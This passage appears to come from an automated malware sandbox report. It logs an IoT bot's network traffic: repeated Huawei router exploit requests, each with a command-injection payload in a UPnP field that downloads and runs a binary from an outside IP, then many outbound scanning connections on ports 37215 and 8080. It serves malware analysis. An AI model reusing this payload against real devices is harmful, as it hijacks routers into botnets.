xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 209.141.40.100 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 30 39 2e 31 34 31 2e 34 30 2e 31 30 30 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 209.141.40.100 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 30 39 2e 31 34 31 2e 34 30 2e 31 30 30 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 209.141.40.100 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 30 39 2e 31 34 31 2e 34 30 2e 31 30 30 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 209.141.40.100 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.166.69.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.98.70.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.22.125.58:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.82.161.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.221.202.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.16.23.86:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.10.204.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.83.37.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.213.55.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.35.102.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.68.186.38:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.33.198.108:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.141.19.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.164.169.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.81.81.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.160.99.215:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.118.28.196:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.90.124.37:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.65.172.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.109.119.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.185.72.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.228.66.243:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.255.244.119:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.206.191.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.242.110.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.156.65.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.255.127.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.186.172.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.165.16.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.246.124.159:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.3.69.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.132.56.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.95.245.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.186.203.76:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.126.172.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.117.169.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.124.67.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.241.127.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.109.183.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.182.254.248:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.124.118.201:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.183.99.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.91.178.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.64.173.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.34.45.97:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.170.93.159:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.225.123.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.161.174.96:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.170.80.220:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.196.79.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.34.198.136:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.2.75.14:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.148.194.172:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.102.11.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.9.205.244:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.133.80.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.108.193.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.61.228.96:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.83.132.172:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.210.60.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.226.125.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.173.115.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.72.81.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.110.184.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.103.227.194:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.31.205.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.231.224.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.159.74.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.186.168.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.12.91.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.248.64.68:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.191.105.236:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.194.141.169:37215
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.162.36.51:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.103.167.51:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.8.123.58:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.195.12.130:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.188.161.210:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.127.211.130:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.98.252.50:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.123.167.26:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.75.229.28:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.44.23.124:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.66.61.183:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.166.171.0:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.235.67.21:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.211.223.200:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.185.205.236:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.247.140.59:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.203.42.222:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.248.249.173:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.110.9.116:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.17.224.29:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.69.135.58:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.11.87.108:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.246.135.24:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.157.224.129:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.91.117.237:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.94.173.97:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.192.72.123:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.105.228.163:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.151.144.165:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.141.253.154:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.169.250.27:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.168.233.11:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.238.4.177:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.201.240.208:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.166.21.191:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.86.130.149:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.8.190.152:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.12.94.41:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.99.0.16:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.24.132.225:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.64.29.27:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.205.87.53:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.252.244.71:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.125.67.205:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.198.80.46:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.127.5.16:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.124.117.4:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.226.120.43:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.183.96.133:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.191.68.138:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.153.32.237:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.180.7.90:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.137.66.205:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.2.243.105:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.99.184.167:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.118.178.144:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.6.123.195:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.22.246.163:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.94.61.241:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.193.176.192:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.71.194.82:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.155.73.221:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.217.152.91:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.168.189.235:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.119.227.77:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.63.156.205:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.18.62.37:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.209.63.213:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.69.129.158:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.193.205.130:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.221.20.98:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.56.62.87:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.116.241.216:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.168.46.153:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.4.147.234:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.162.219.107:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.129.73.130:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.70.198.28:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.228.116.7:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.28.26.123:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.139.182.201:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.0.147.97:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.74.76.195:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.86.124.124:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.135.252.18:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.148.82.41:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.53.128.228:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.215.170.31:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.72.38.229:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.74.238.59:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.28.210.67:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.181.204.141:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.22.1.2:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.82.99.15:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.93.176.162:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.43.54.50:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.53.140.109:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.235.231.45:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.252.123.135:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.34.138.207:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.33.73.29:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.53.204.123:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.104.78.88:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.73.107.50:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.232.217.73:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.39.83.206:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.180.148.240:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.57.26.26:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.233.254.253:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.203.225.249:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.149.112.41:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.185.147.164:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.164.140.167:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.234.96.125:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.165.198.102:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.41.73.248:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.98.78.217:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.137.195.14:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.73.199.220:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.70.199.37:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.161.134.143:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.140.60.146:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.24.82.186:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.44.146.174:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.220.56.67:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.192.107.131:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.133.205.61:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.167.28.132:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.210.192.222:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.50.8.177:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.19.229.178:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.3.88.184:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.87.221.2:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.5.30.243:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.180.22.225:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.94.38.239:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.115.14.196:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.223.22.83:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.133.197.40:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.245.41.91:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.98.107.150:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.219.35.125:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.51.17.252:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.169.54.190:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.246.3.92:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.10.167.231:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.137.81.75:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.133.45.200:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.146.194.200:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.223.70.122:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.10.175.97:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.56.16.209:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.223.138.248:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.57.185.65:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.158.87.93:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.55.60.74:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.130.22.237:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.6.222.254:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.184.188.113:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.161.184.87:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.219.174.148:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.137.6.189:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.172.187.138:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.98.171.168:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.243.157.101:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.77.17.201:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.123.9.218:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.15.158.160:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.21.105.143:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.255.14.209:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.128.22.76:8080
